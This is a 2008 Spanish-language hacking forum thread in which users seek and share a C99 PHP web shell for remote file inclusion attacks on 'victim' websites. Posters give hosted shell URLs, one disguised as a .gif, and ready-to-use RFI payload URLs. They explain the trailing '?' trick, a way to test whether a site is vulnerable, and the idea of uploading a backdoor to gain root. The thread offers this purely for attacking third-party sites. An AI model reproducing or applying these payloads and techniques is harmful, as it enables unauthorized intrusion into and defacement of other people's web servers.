shell para rfi

Tyrz · 26 Enero 2008, 11:02 AM

necesito una shell para rfi, me podéis decir si hay alguna web que tenga una o si en hosting gratuitos te deja subirla? Es que no creo q en un hosting gratuito te dejen usar system() o execute()
Gracias

-sagitari- · 26 Enero 2008, 15:00 PM

C99
http://usuarios.lycos.es/elitehacknet/C99Shell.txt

salu2
pd,
a la hora de ejecutarlo tienes que pones un "?" al final de txt
para que se ejecute y no salga como texto plano....

ej:

Código [Seleccionar]

www.webvictima.com/index.php?page=http://usuarios.lycos.es/elitehacknet/C99Shell.txt?

_

Tyrz · 26 Enero 2008, 15:47 PM

me sale como texto plano con el ? =S

-sagitari- · 26 Enero 2008, 18:09 PM

aquí la tienes en formato gif que te la he subido a un host:

Código [Seleccionar]

http://www.freewebtown.com/sagitari/c99.gif

Si no te funciona prueba de poner el " ? " al final de gif..

salu22

Tyrz · 26 Enero 2008, 20:27 PM

No se puede mostrar la imagen "http://www.freewebtown.com/sagitari/c99.gif" porque contiene errores.

Con y sin ? sale eso =S

Con algunas sirve y con otras no, xq?
Gracias por subirme las shells tio te debo una

Tyrz · 26 Enero 2008, 20:53 PM

funcionan bien las shell? no me deja ver code ni subir cosas

-sagitari- · 26 Enero 2008, 21:19 PM

a ver.. estás seguro de que puedes hacer RFI en la web que estás probando?..
mándame el link "de la web víctima" por mensaje privado.. porque por aquí no puedes dar datos de terceros..

porque a lo mejor la web te estás equivocando, no es vulnerable a rfi y no deja incluir archivos externos....
o la web está en lenguaje asp? porque entonces lógico que no pueda leer shells en php ..

salu2 ...

pd, soy tía
y de nada!

BBOYHACK · 27 Enero 2008, 06:25 AM

buenas amigos tengo el mismo problema intente C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...

segun un scaning que le realize la web es vulnenable ha

Linkliste Index.PHP Multiple Remote File Include Vulnerabilities

http://www.securityfocus.com/bid/26045/exploit

http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.gif
http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.txt?

Tyrz · 27 Enero 2008, 10:31 AM

mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que valla guay

-sagitari- · 27 Enero 2008, 19:34 PM

Cita de: Zero- en 27 Enero 2008, 10:31 AM
mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que vaya guay

es lo que te dije por privado..
hay muchas que al introducir la shell no te deja subir archivos
ni modificar
porque no tienes permisos de escritura 777
porque no eres root
y solamente tienes permisos de lectura..
entonces para poder tener permisos de root
tienes que subir un backdoor

pero eso no significa que no sea vulnerable
solamente resulta un poco más complejo
modificar la web..

Citarbuenas amigos tengo el mismo problema intente C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...

pues no será vulnerable..
prueba:

Código [Seleccionar]

www.webvictima.com/index.php?page=http://google.es

si no se te abre la web de google no es vulnerable...

y hay veces que el archivo que introduces sí se abre
pero de forma ajena al servidor.. por lo tanto no afectaría....
ni sería vulnerable.......

salu2